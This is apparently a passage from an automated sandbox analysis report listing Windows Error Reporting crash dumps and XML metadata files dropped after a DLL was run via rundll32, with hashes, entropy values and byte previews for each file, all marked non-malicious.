                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.0.4.7.7.0.5.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.5.4.7.0.0.9.4.5.8.1.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.1.0.4.c.a.a.-.1.9.8.3.-.4.b.7.1.-.8.7.8.f.-.b.d.3.5.2.6.3.5.1.4.c.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.0.d.6.4.0.9.-.5.7.e.5.-.4.e.e.b.-.9.f.a.5.-.f.4.d.1.5.0.d.f.3.6.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.v.i.e.r.m._.s.o.f.t._.x.6.4...d.l.l...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.2.c.-.0.0.0.1.-.0.0.1.4.-.6.9.c.c.-.d.1.5.9.c.4.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C74.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48424
                                                                                                                                                                                                                      Entropy (8bit):1.410090684808478
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5b8fOpoA2aC4FJXNMJpizjgpsIoi7MXZdV43FXwSnFTZ8WLApnOS4lCS9WIXnIBR:O08oOMXZwXwSnFTZ8W8nOSTSuai/f
                                                                                                                                                                                                                      MD5:B8C8DCAA2AB7157AAAB9AB22C74124AF
                                                                                                                                                                                                                      SHA1:BB16DD72BAD8A8375257EE28BA6FC33A224AE5BB
                                                                                                                                                                                                                      SHA-256:4A151D46C5179D65C701AF5C6CC993292F65014D53F12F083EB38777ECF3CE30
                                                                                                                                                                                                                      SHA-512:9CECEA12ABC8BA0A340A2ACA1057C0FC49FE019BEDF5DA730049F650C417FEA9A01C2389165C83D7C2489B3582A1BDBFBB40143C658AA076C80D434A7DD64E8C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......&..f.........................................(..........T.......8...........T............... ...........|...........h...............................................................................eJ..............Lw......................T...........&..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C84.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:54 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48748
                                                                                                                                                                                                                      Entropy (8bit):1.4019290022352078
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:5b8kxoA2aC4FJXNMJpisxjcOGoi7MTNrzk6aSwjIlmSnDpuS5WIQL86IBbxQc7vo:Og8rOMTNrCSw/SDpuSvB7xOpX
                                                                                                                                                                                                                      MD5:D4E6B720329DF0A282D6CAE9000F8624
                                                                                                                                                                                                                      SHA1:3BFFEF2D86CB2F3C95F2120D084048465BD4FD77
                                                                                                                                                                                                                      SHA-256:06E06CCE109DE71F81594863382D456DC02D0C74A3BE465D88813F6173F10857
                                                                                                                                                                                                                      SHA-512:C4A53A239F5F9B6D46884B3C3C94122FD26CF3AEA4C321DA67993E7D906E8ADDBA4B2ACDB929651704BBE48B8A7810EBC27660950495B446F77042EB24BFBD3B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......&..f.........................................(..........T.......8...........T...........................|...........h...............................................................................eJ..............Lw......................T.......@...&..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D12.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8664
                                                                                                                                                                                                                      Entropy (8bit):3.6994987851471235
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ/kPUC46YKeF5gmfI3ZApDa89bsgZf1Em:R6lXJsPUr6YTLgmfI3gsmfT
                                                                                                                                                                                                                      MD5:77DC60C071FDC2E902198E8F29036A4A
                                                                                                                                                                                                                      SHA1:18BB6F52EE4889A3B3995C4B3BDB6101A591D4B7
                                                                                                                                                                                                                      SHA-256:344577E4D04E928DA2D29DDE13B7DAADC9C2F30ECAC740F9161D95FCBB05485C
                                                                                                                                                                                                                      SHA-512:592437F03B3142F0A5006D45471F8484E3A0091CC30589E37926E6DA1ACDE6996AC681DC0B6F3CEC1266F0D972FE9AF75CE25527C5BC5747764311E93C15A7AE
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.4.8.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D42.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4940
                                                                                                                                                                                                                      Entropy (8bit):4.510541971862157
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYMU0Ym8M4JCECyTOXFspByq8vhyTOJ0ptSTSZ:uIjfwwI7FQ7V/eJL3WGk0poOLd
                                                                                                                                                                                                                      MD5:E0D7E9261089575825C1D9D643729273
                                                                                                                                                                                                                      SHA1:95EDB180B1B89F32268057AB49534EF2EB6426C1
                                                                                                                                                                                                                      SHA-256:2CC210957D3AE59D0355EEB9F432785478CFB9278B28397E1D0F77B3A1207B52
                                                                                                                                                                                                                      SHA-512:AF267AEAF3A9E48E6DC3AA5CBEEF1B7A56FCFE13B5C4F9957F1D0B1625D0C797D6FB12BB0146C8849EC7548719257D6AEF104856AC3DE960D8689EDC05E86B04
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DBF.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8652
                                                                                                                                                                                                                      Entropy (8bit):3.7006434898887206
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJk/lUM6YEFHwygmfI3ZApDP89bsgZf3Em:R6lXJslUM6YEFlgmfI3TsmfB
                                                                                                                                                                                                                      MD5:7A125DB64830109BB6C05587F7434C0A
                                                                                                                                                                                                                      SHA1:218B6077AFBAD88DC7ACC33595630477272FC444
                                                                                                                                                                                                                      SHA-256:B517AC6E3A848C1FDE21FFE9413FB8CAEF8E46BE8B472E46ABC89AFE722408FD
                                                                                                                                                                                                                      SHA-512:6797EC7CF101CC92869FCED927163A3276B39A750CDA7468373268A6417C11B3D8D2113C2A91C856BBE3F034BCDFA9488F0A3F8809C7B17D4C310B3A86D5E565
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.8.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5DEE.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4940
                                                                                                                                                                                                                      Entropy (8bit):4.506811322477142
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYHYm8M4JCECyTOXFCOPyq8vhyTOt/ptSTSOd:uIjfwwI7FQ7V7JL3OPWG4/poOOd
                                                                                                                                                                                                                      MD5:0D23C17D0079AE5E7A0BAB2C67F072C8
                                                                                                                                                                                                                      SHA1:A27FB4722DF7136DF57861A7C3E21D38D96A99A6
                                                                                                                                                                                                                      SHA-256:D50805C3F1D03D1377CAE4B71CB12942C2707E017E23EBD9A789A118CA911557
                                                                                                                                                                                                                      SHA-512:C04163AB5DD5440552CB7F9E4343B63A1B9ED4A03F2B9F43C37ED5D5A3DD476F278BB062039C2BC29C1399B8014586869F5183E721260DF95188905E7FA8750E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6761.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:44:57 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):57260
                                                                                                                                                                                                                      Entropy (8bit):1.6622455505482143
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5f9810OMBizj/dWS4S3AfWvJwxVL5ODWQzzMpBDcdwSwC0QO:heFuajdVQftVL5OMq9wCW
                                                                                                                                                                                                                      MD5:990796569D66E1CCCC6567A73E4F6286
                                                                                                                                                                                                                      SHA1:3CEE9E1D389DB6E2F721B60EA81E813764CEBC49
                                                                                                                                                                                                                      SHA-256:3B429B1535FE6FE47CD53F433AEED20512B8421E3FFB6D03619ABCCB73F3F7F3
                                                                                                                                                                                                                      SHA-512:B2382073D0D8F0DF971F73BB3AF70CFD066388EE28FDC9B115AB13B348FF7553418B4DF059D571C7254E9B4D543DCA4BB1300EA9DF6C2E12B41EECE9ECA7A131
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......)..f.........................................(..........T.......8...........T...........................|...........h...............................................................................eJ..............Lw......................T...........)..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER67A1.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8794
                                                                                                                                                                                                                      Entropy (8bit):3.7057873521258604
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJQQrUP6YEFXwygmf1VMOprw89bn+jfSGdvtm:R6lXJnrUP6YEllgmf1VFnCf1O
                                                                                                                                                                                                                      MD5:AC3916582DEBC9EFACDD388D394056E1
                                                                                                                                                                                                                      SHA1:524207053F60E6A70ABF95ECF8747C510F1FDE75
                                                                                                                                                                                                                      SHA-256:164C37ADFE36B0E77401623A26C95863323E53357E224985CF76786BFD71BF64
                                                                                                                                                                                                                      SHA-512:AEF9F7E99D4341548C30E2B88C57004F2D9D0A26FADAEE7FDD7AB296C975E57D20C76CF2F6C32B0ED2F06BAC63F54448526883F8925EB3FA7726714F0BB5FA8E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER67D1.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.492390562531089
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VY/Ym8M4JCECyJFAgjyq85muQZBptSTSDd:uIjfwwI7FQ7VjJ0gjpZBpoODd
                                                                                                                                                                                                                      MD5:8F46B4F144DA74D9B85F9317F2B5AC28
                                                                                                                                                                                                                      SHA1:12E68D1F42BBB47CA73BA9CBD41A7826D5F61DA1
                                                                                                                                                                                                                      SHA-256:C5E6B73D4943D1603B32CBF219F10D4EA7ABCC8F39A7285C35A5259B67240E71
                                                                                                                                                                                                                      SHA-512:A8801A1A7D69198BF82B08D23C3D362CB04949CFC681F8DDF30A77E8E499AA6A00C5F5FD80E72FD04B9464359F40B76E2E6009733D8747BBCE8D2D95866E552E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527627" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7367.tmp.dmp

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu Oct 3 18:45:00 2024, 0x1205a4 type
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):56812
                                                                                                                                                                                                                      Entropy (8bit):1.5839522802611306
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:QC870LOMpSBS3xkop+BY6yg4uDRDSJSmh+K:qISoSI3zpOygjDgAmh+
                                                                                                                                                                                                                      MD5:70BBE510900F7C11904E20A030F35912
                                                                                                                                                                                                                      SHA1:6BE9EF462D7F1C0FEA85C5035F51A105E30D6DA4
                                                                                                                                                                                                                      SHA-256:ABF3CFAF70481732A5CDDCA545F9D40E3E62753B3EAC50665BFF64A37F672DC1
                                                                                                                                                                                                                      SHA-512:342764BAB3A872BE96BA0FD1B54D64B88ACB464E1268DD070BA8531C06A98DB809AD791D0EDB1DC832B5C022C326A5E28720F1ABF62BA91FB6A4BB4D598647C0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:MDMP..a..... .......,..f.........................................(..........T.......8...........T...........................|...........h...............................................................................eJ..............Lw......................T.......,...,..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER73E5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):8794
                                                                                                                                                                                                                      Entropy (8bit):3.706398318166195
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJQhqUv6YEFwLwygmf19TprM89bMLjfIkm:R6lXJWqUv6YEclgmf193MvfK
                                                                                                                                                                                                                      MD5:C78DA9EC8BDD916D0400D32C0879CFFD
                                                                                                                                                                                                                      SHA1:B16D622F4FB8C466C3E34DE5D2B19E9419C30534
                                                                                                                                                                                                                      SHA-256:10BF40F7D31BE00795D8044B3EF166611BD83C95DE3AA74C7DE56A3ADE7B26C0
                                                                                                                                                                                                                      SHA-512:DE1EE361F6F1175CC155B41B4B5496614915272CB9514ABB7BF8654E42BEAD23D54225EFDEAF2AE436D37792EC9F649B603952EB25164DE48434331C632BD4B0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.6.8.<./.P.i.

                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7444.tmp.xml

                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4794
                                                                                                                                                                                                                      Entropy (8bit):4.492928908184564
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zse2OiJg771I9eBWpW8VYLYm8M4JCECydFlyq85muTptSTShqd:uIjfwwI7FQ7V3JFCpoOhqd
                                                                                                                                                                                                                      MD5:67EB87ACB5405A702CA51007E14D61AB
                                                                                                                                                                                                                      SHA1:07B2611A6C3E3C411F2C984FE3F0C7BE05685DBF
                                                                                                                                                                                                                      SHA-256:AA7367638F223B27F7E5FC188070E7536752353266949AA066C07CDED7BB1A4F
                                                                                                                                                                                                                      SHA-512:55C93CA8451B62207499E109A7CD5B27156A416914B7FB3F1E12AAAC97F91F255E25E8F8D2DE23B35F94E37F263DFAE5D8D556D2E7F47C37F021B48310F0356E
                                                                                                                                                                                                                      Malicious:false
